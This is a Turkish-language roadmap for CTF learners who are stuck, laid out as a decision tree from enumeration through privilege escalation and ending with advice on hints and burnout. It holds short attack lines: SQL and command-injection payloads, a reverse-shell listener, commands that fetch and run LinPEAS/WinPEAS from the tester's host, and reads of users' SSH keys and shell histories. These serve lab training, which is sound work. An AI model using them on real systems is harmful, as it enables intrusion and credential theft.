🆘 ROADMAP: Takıldığımda Ne Yapmalıyım?
"Her engel, yeni bir şey öğrenme fırsatıdır."
📋 İçindekiler
🎯 Giriş
CTF ve penetrasyon testinde takılmak normaldir. Bu rehber, takıldığınızda:
- Nereden devam edeceğinizi
- Hangi kaynaklara başvuracağınızı
- Nasıl problemi çözeceğinizi
gösterir.
⚠️ Önemli Prensip
TEXT
❌ YANLIŞ: "5 dakika denedim, writeup okumalıyım"
✅ DOĞRU: "En az 30-60 dakika daha farklı yaklaşımlar denemeliyim"
HATIRLA: En çok öğrenme, takıldığın ve çözmeye çalıştığın anlardadır!🗺️ Ana Karar Ağacı
TEXT
CTF/Machine çözemiyorum, takıldım
│
├─► Ne kadar süre uğraştım?
│ │
│ ├─► 5-10 dakika ──► ❌ Çok erken! En az 30 dk daha dene
│ ├─► 30-60 dakika ──► ✅ Hangi aşamada takıldın?
│ └─► 2+ saat ────► ✅ Yardım alabilitsin
│
▼
Hangi aşamada takıldım?
│
├─► 1️⃣ ENUMERATION (Keşif)
│ └─► "Port taraması yaptım ama bir şey bulamıyorum"
│ └─► "Web sayfası var ama gizli dizin bulamıyorum"
│ └─► "Hiçbir exploit çalışmıyor"
│
├─► 2️⃣ INITIAL ACCESS (İlk Giriş)
│ └─► "Zafiyeti buldum ama exploit edemedim"
│ └─► "Shell alamıyorum"
│ └─► "Credential brute force çalışmıyor"
│
├─► 3️⃣ PRIVILEGE ESCALATION (Yetki Yükseltme)
│ └─► "Shell aldım ama root olamıyorum"
│ └─► "LinPEAS çalıştırdım ama bir şey bulamadım"
│ └─► "Bir şey buldum ama exploit etmeyi bilmiyorum"
│
└─► 4️⃣ POST-EXPLOITATION
└─► "Root oldum ama flag bulamıyorum"
└─► "Lateral movement yapamıyorum"🔍 Hangi Aşamada Takıldım?
1️⃣ ENUMERATION (Keşif Aşaması)
TEXT
Sorun: "Port taraması yaptım ama bir şey bulamıyorum"
│
├─► Tüm portları taradın mı?
│ │
│ No ──► FIX:
│ │ nmap -p- -sV -sC -A <IP> --min-rate=1000
│ │ • -p- : Tüm portlar (1-65535)
│ │ • --min-rate=1000 : Hızlı tarama
│ │ • Süre: 5-10 dakika daha bekle
│ │
│ Yes
│ │
├─► UDP taraması yaptın mı?
│ │
│ No ──► FIX:
│ │ sudo nmap -sU --top-ports 100 <IP>
│ │ • SNMP (161), TFTP (69) gibi UDP servisleri
│ │
│ Yes
│ │
├─► Servis versiyonlarını not aldın mı?
│ │
│ No ──► FIX:
│ │ • Her servis için version bilgisini Google'da ara
│ │ • searchsploit <service> <version>
│ │ • Google: "<service> <version> exploit"
│ │
│ Yes
│ │
└─► Hala bulamadım
│
└─► Checklist:
□ Banner grabbing yaptım mı? (nc <IP> <port>)
□ Nmap script taraması yaptım mı? (--script=vuln)
□ Özel port kombinasyonları var mı?
□ Firewall/filtering var mı?
➡️ Kaynak: 📖 guides/02_recon_enumeration/TEXT
Sorun: "Web sayfası var ama gizli dizin bulamıyorum"
│
├─► Hangi wordlist kullandın?
│ │
│ ├─► common.txt ──► ⚠️ Çok küçük!
│ │ FIX: Daha büyük wordlist dene
│ │ • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
│ │ • SecLists: Discovery/Web-Content/
│ │
│ └─► directory-list-2.3 ──► ✅ İyi, devam et
│ │
│ ├─► Farklı extensionlar denedin mi?
│ │ │
│ │ No ──► FIX:
│ │ │ gobuster dir -u http://<IP> -w wordlist.txt -x php,html,txt,pdf,zip,bak
│ │ │ • Web teknolojisine göre: .asp, .aspx, .jsp
│ │ │
│ │ Yes
│ │ │
│ ├─► Farklı tool denedin mi?
│ │ │
│ │ No ──► FIX:
│ │ │ • Gobuster sonuç vermezse → ffuf dene
│ │ │ • ffuf -u http://<IP>/FUZZ -w wordlist.txt
│ │ │ • dirsearch veya feroxbuster dene
│ │ │
│ │ Yes
│ │ │
│ └─► Subdomain enumeration yaptın mı?
│ │
│ No ──► FIX:
│ │ ffuf -u http://FUZZ.<domain> -w subdomains.txt -H "Host: FUZZ.<domain>"
│ │ • Sadece IP varsa gerek yok
│ │
│ Yes
│ │
│ └─► Kaynak kontrolleri:
│ □ robots.txt kontrol ettim mi?
│ □ sitemap.xml var mı?
│ □ Kaynak kodu inceledim mi? (Ctrl+U)
│ □ JavaScript dosyalarını inceledim mi?
│ □ Cookies/Headers ilginç bir şey var mı?
│
➡️ Kaynak: 📖 guides/02_recon_enumeration/web_enumeration/2️⃣ INITIAL ACCESS (İlk Giriş Aşaması)
TEXT
Sorun: "Zafiyeti buldum ama exploit edemedim"
│
├─► Exploit türü nedir?
│ │
│ ├─► SQL Injection
│ │ │
│ │ ├─► Manuel denedim mi?
│ │ │ └─► ' OR 1=1--
│ │ │ └─► admin' --
│ │ │ └─► FIX: 📄 cheatsheets/phase_1/sql_injection_cheatsheet.md
│ │ │
│ │ ├─► SQLMap kullandım mı?
│ │ │ └─► sqlmap -u "http://<IP>/page.php?id=1" --batch --dump
│ │ │ └─► FIX: 📖 guides/03_web_exploitation/web_exploitation.md
│ │ │
│ │ └─► Hala çalışmıyor?
│ │ └─► WAF bypass dene
│ │ └─► 📄 cheatsheets/phase_8/waf_bypass_cheatsheet.md
│ │
│ ├─► Command Injection
│ │ │
│ │ └─► Farklı payload'lar denedin mi?
│ │ └─► ; ls
│ │ └─► | ls
│ │ └─► `ls`
│ │ └─► $(ls)
│ │ └─► FIX: 📄 cheatsheets/phase_2/command_injection_cheatsheet.md
│ │
│ ├─► File Upload
│ │ │
│ │ └─► Bypass teknikleri denedin mi?
│ │ └─► .php → .php5, .phtml, .phar
│ │ └─► Magic bytes değiştir
│ │ └─► Double extension: .php.jpg
│ │ └─► FIX: 📄 cheatsheets/phase_1/file_upload_bypass_cheatsheet.md
│ │
│ └─► Public Exploit
│ │
│ └─► Exploit çalışmıyor?
│ ├─► Doğru versiyonu kullanıyor muyum?
│ ├─► Exploit kodunu okudum mu?
│ ├─► Gerekli parametreleri verdim mi?
│ ├─► Python version uyumlu mu? (Python2 vs Python3)
│ └─► FIX: Exploit kodunu debug et, print ekleTEXT
Sorun: "Shell alamıyorum"
│
├─► Listener açık mı?
│ │
│ No ──► FIX: nc -lvnp 4444
│ │
│ Yes
│ │
├─► Firewall engelliyor olabilir mi?
│ │
│ Maybe ──► FIX: Farklı portlar dene
│ │ • 443, 53, 80 gibi yaygın portlar
│ │ • nc -lvnp 443
│ │
│ No
│ │
├─► Farklı reverse shell payload'ları denedin mi?
│ │
│ No ──► FIX:
│ │ 📄 cheatsheets/phase_1/reverse_shells_cheatsheet.md
│ │ • Bash reverse shell
│ │ • Python reverse shell
│ │ • PHP reverse shell
│ │ • Netcat reverse shell
│ │ • PowerShell reverse shell (Windows)
│ │
│ Yes
│ │
├─► IP adresini doğru mu girdin?
│ │
│ └─► Kontrol: ip a veya ifconfig
│ • VPN IP'ni kullan (tun0)
│ • Makine IP'ni değil!
│
└─► Hala çalışmıyor?
│
└─► Alternatifler:
• Bind shell dene
• Web shell yükle ve komut çalıştır
• SSH key injection (varsa)
➡️ Kaynak: 📖 guides/04_exploitation_payloads/shells_guide.md3️⃣ PRIVILEGE ESCALATION (Yetki Yükseltme)
TEXT
Sorun: "Shell aldım ama root olamıyorum"
│
├─► Hangi sistem?
│ │
│ ├─► Linux
│ │ │
│ │ ├─► LinPEAS çalıştırdım mı?
│ │ │ │
│ │ │ No ──► FIX:
│ │ │ │ wget http://<YOUR_IP>/linpeas.sh
│ │ │ │ chmod +x linpeas.sh
│ │ │ │ ./linpeas.sh | tee linpeas_output.txt
│ │ │ │ • Kırmızı/sarı output'lara odaklan
│ │ │ │
│ │ │ Yes
│ │ │ │
│ │ ├─► Manuel enumeration yaptım mı?
│ │ │ │
│ │ │ No ──► FIX:
│ │ │ │ sudo -l # Sudo rights
│ │ │ │ find / -perm -4000 2>/dev/null # SUID
│ │ │ │ cat /etc/crontab # Cron jobs
│ │ │ │ cat /etc/passwd # Users
│ │ │ │ ps aux # Processes
│ │ │ │ netstat -ano # Network
│ │ │ │
│ │ │ Yes
│ │ │ │
│ │ └─► Bulduklarımı exploit etmeyi biliyor muyum?
│ │ │
│ │ ├─► SUID buldum
│ │ │ └─► GTFOBins: https://gtfobins.github.io/
│ │ │ └─► Arama: SUID binary name
│ │ │ └─► 📄 cheatsheets/phase_3/Living_lolbins_gtfobins_cheatsheet.md
│ │ │
│ │ ├─► Sudo rights buldum
│ │ │ └─► sudo -l output'unu GTFOBins'de ara
│ │ │ └─► FIX: 📖 guides/05_privilege_escalation/linux_privesc_kapsamli.md
│ │ │
│ │ ├─► Cron job buldum
│ │ │ └─► Writable mi? (ls -la /path/to/script)
│ │ │ └─► PATH injection yapabilir miyim?
│ │ │ └─► FIX: 📖 writeups/ornek_senaryolar/ornek4_cronjob.md
│ │ │
│ │ └─► Kernel exploit
│ │ └─► uname -a
│ │ └─► searchsploit kernel <version>
│ │ └─► 📄 cheatsheets/phase_3/kernel_exploits_cheatsheet.md
│ │
│ └─► Windows
│ │
│ ├─► WinPEAS çalıştırdım mı?
│ │ │
│ │ No ──► FIX:
│ │ │ certutil -urlcache -f http://<YOUR_IP>/winPEASx64.exe winpeas.exe
│ │ │ .\winpeas.exe
│ │ │
│ │ Yes
│ │ │
│ ├─► Manuel enumeration yaptım mı?
│ │ │
│ │ No ──► FIX:
│ │ │ whoami /all # Privileges
│ │ │ net user # Users
│ │ │ net localgroup administrators # Admins
│ │ │ sc query # Services
│ │ │ reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" # AutoLogon
│ │ │
│ │ Yes
│ │ │
│ └─► Bulduklarımı exploit etmeyi biliyor muyum?
│ │
│ ├─► Service exploit
│ │ └─► Unquoted service path
│ │ └─► Weak service permissions
│ │ └─► FIX: 📖 guides/05_privilege_escalation/windows_privesc.md
│ │
│ ├─► Token manipulation
│ │ └─► SeImpersonatePrivilege var mı?
│ │ └─► PrintSpoofer / JuicyPotato
│ │ └─► FIX: 📄 cheatsheets/phase_3/windows_privesc_cheatsheet.md
│ │
│ └─► Registry exploits
│ └─► AlwaysInstallElevated
│ └─► Weak registry permissions
│
└─► Detaylı rehber:
📖 guides/05_privilege_escalation/
📖 guides/01_strateji_metodoloji/karar_agaci_ileri.mdTEXT
Sorun: "LinPEAS çalıştırdım ama bir şey bulamadım"
│
└─► DURUM DEĞERLENDĠRMESĠ:
│
├─► 1. Output'u kaydettin mi?
│ └─► ./linpeas.sh | tee output.txt
│ └─► Offline oku, detaylı incele
│
├─► 2. Kırmızı/Sarı çıktılara baktın mı?
│ └─► LinPEAS renk kodlaması kullanır
│ └─► Kırmızı = Yüksek öncelik
│ └─► Sarı = Orta öncelik
│
├─► 3. Manuel enumeration yaptın mı?
│ └─► LinPEAS her şeyi bulamayabilir
│ └─► sudo -l
│ └─► getcap -r / 2>/dev/null
│ └─► find / -writable 2>/dev/null
│
├─► 4. Kullanıcı dosyalarını inceledin mi?
│ └─► cat /home/*/.bash_history
│ └─► cat /home/*/.ssh/id_rsa
│ └─► find /home -name "*.txt" -o -name "*.conf"
│
└─► 5. Web root inceledin mi?
└─► /var/www/html
└─► Config dosyaları (db credentials)
└─► Backup dosyaları4️⃣ POST-EXPLOITATION
TEXT
Sorun: "Root oldum ama flag bulamıyorum"
│
├─► Doğru yerde arıyor muyum?
│ │
│ └─► Standart lokasyonlar:
│ • /root/root.txt
│ • /root/flag.txt
│ • /home/<user>/user.txt
│ • C:\Users\Administrator\Desktop\root.txt
│ • C:\Users\<user>\Desktop\user.txt
│
├─► Find komutu kullandım mı?
│ │
│ No ──► FIX:
│ │ find / -name "*flag*" 2>/dev/null
│ │ find / -name "*root.txt*" 2>/dev/null
│ │ find / -name "user.txt" 2>/dev/null
│ │
│ Yes
│ │
├─► Gizli dosya olabilir mi?
│ │
│ └─► FIX:
│ ls -la /root
│ ls -la /home/<user>
│ • Gizli dosyalar . ile başlar
│
└─► Hala bulamadım?
│
└─► İpuçları:
• HTB: /root/root.txt ve /home/<user>/user.txt
• THM: Oda açıklamasında belirtilir
• Base64 encoded olabilir
• Steganography olabilir🆘 Yardım Alma Stratejileri
1. Self-Help (İlk 30-60 Dakika)
TEXT
Adım 1: Derin nefes al, sakinleş
• Frustrasyon normaldir
• Mola ver (5-10 dakika)
Adım 2: Şimdiye kadar ne yaptığını not al
• Hangi komutları çalıştırdım?
• Hangi sonuçları aldım?
• Ne denedim, ne çalışmadı?
Adım 3: Farklı yaklaşım dene
• Farklı wordlist
• Farklı tool
• Farklı payload
• Farklı port
Adım 4: İlgili cheatsheet'i oku
📄 cheatsheets/ klasöründeki ilgili dosya
• Kaçırdığın bir teknik olabilir
Adım 5: Örnek senaryolara bak
📖 writeups/ornek_senaryolar/
• Benzer bir senaryo var mı?2. Hafif İpucu (60-90 Dakika Sonra)
TEXT
Forum'dan hafif ipucu al (writeup OKUMA!):
HTB:
• Forum > Machines > <Machine Name>
• "Nudge" butonuna tıkla
• Spoiler olmayan ipuçları oku
TryHackMe:
• Room'da "Hint" butonu varsa kullan
• Discord #help kanalı
Genel:
• Reddit: r/hackthebox, r/tryhackme
• Discord: Official sunucular
• SADECE: "Hangi yöne bakmalıyım?" tarzı genel ipuçları3. Writeup (2+ Saat Sonra)
TEXT
Eğer 2+ saat uğraştıysan ve ilerleyemediysen:
Adım 1: Writeup bul
• HTB: Makine retired olmalı
• THM: Oda tamamlanabilir
• YouTube: IppSec, 0xdf, John Hammond
Adım 2: SADECE takıldığın adımı oku
• Tüm writeup'ı okuma!
• Sadece "Initial Access" veya "PrivEsc" bölümü
• İpucunu al, devam et
Adım 3: Çözümü kendinde tekrarla
• Writeup'taki komutu kopyala-yapıştırma
• Kendin yaz ve anla
• Not al
Adım 4: Benzer bir makine daha çöz
• Aynı tekniği pekiştir
• Farklı bir makinede uygula4. Topluluk Yardımı
TEXT
Discord/Forum'da soru sor:
✅ İYİ SORU:
"HTB Lame makinesinde enumeration yaptım. Nmap çıktısı:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
SMB'de anonymous login denedim ama erişim yok. FTP'de de aynı durum.
Hangi yöne bakmalıyım?"
❌ KÖTÜ SORU:
"Lame makinesini çözemedim, exploit linki atar mısınız?"
"PrivEsc nasıl yapılır?"
İyi soru özellikleri:
• Şimdiye kadar ne yaptığını göster
• Spesifik ol
• Sonuçları paylaş
• Direkt çözüm isteme, yön iste💪 Motivasyon ve Zihinsel Durum
Takılmak Normaldir!
TEXT
Gerçek:
• Profesyonel pentester'lar bile takılır
• Her CTF bir öğrenme deneyimidir
• Zorlanmak = Büyümek
"Kolay makineler bize bir şey öğretmez,
zor olanlar öğretir."Burnout (Tükenmişlik) Önleme
TEXT
Belirtiler:
□ Artık eğlenmiyorum
□ Her şey çok zor geliyor
□ Motivasyonum kalmadı
□ Açtığım her makine sıkıyor
Çözüm:
1. MOLA VER
• 1-2 gün hiç CTF yapma
• Başka hobilerle ilgilen
2. Kolaydan başla
• Çok zor makineden kolay machine'e geç
• Özgüven kazanmak için kolay bir tane çöz
3. Farklı alan dene
• Web'den sıkıldıysan AD dene
• CTF'den sıkıldıysan forensics yap
4. Toplulukla etkileşim
• Discord'da sohbet et
• Writeup oku (çözmeden)
• Başkalarına yardım et
5. Hedef değiştir
• "10 makine çözmeliyim" yerine
• "1 yeni teknik öğrenmeliyim"Growth Mindset
TEXT
Fixed Mindset (Sabit Zihniyet):
❌ "Ben buna yetenekli değilim"
❌ "Bu çok zor, yapamam"
❌ "Başkaları daha iyi"
Growth Mindset (Gelişim Zihniyeti):
✅ "Henüz bilmiyorum, ama öğreneceğim"
✅ "Zor, ama çalışırsam yapabilirim"
✅ "Başkaları nasıl yaptı, ben de öğrenebilirim"
Hatırla:
• Herkes bir noktada başladı
• Senin gördüğün "uzman"lar da bir zamanlar yeni başlamıştı
• Consistent (tutarlı) çalışma > Yetenek✅ Özet: Ne Zaman Ne Yapmalı?
TEXT
0-30 dakika:
└─► Kendi başına dene, farklı yaklaşımlar
30-60 dakika:
└─► Cheatsheet oku, örnek senaryolara bak
60-90 dakika:
└─► Forum'dan hafif ipucu al (spoiler-free)
90-120 dakika:
└─► Mola ver, başka bir şey yap, tekrar dön
2+ saat:
└─► Writeup'ın ilgili bölümünü oku
└─► Öğren, not al, benzer makine çöz
Tükendim:
└─► 1-2 gün mola ver
└─► Kolay makine çöz
└─► Farklı alan dene
└─► Toplulukla etkileşim🎯 Son Hatırlatmalar
TEXT
✅ Takılmak öğrenmenin bir parçasıdır
✅ Sabırlı ol, her şey zamanla gelir
✅ Hata yapmak normaldir
✅ Topluluktan yardım istemekten çekinme
✅ Her çözüm seni daha iyi yapar
✅ Mola vermek, pes etmek değildirPes etme, devam et! 🚀
📞 Yardım Kaynakları
Topluluklar
TEXT
Discord:
• TryHackMe Official
• HackTheBox Official
• Cybersecurity & Hacking (unofficial)
Reddit:
• r/hackthebox
• r/tryhackme
• r/netsec
• r/AskNetsec
Forum:
• HTB Forums
• HTB Discord #helpYouTube Kanalları
TEXT
• IppSec (HTB Writeups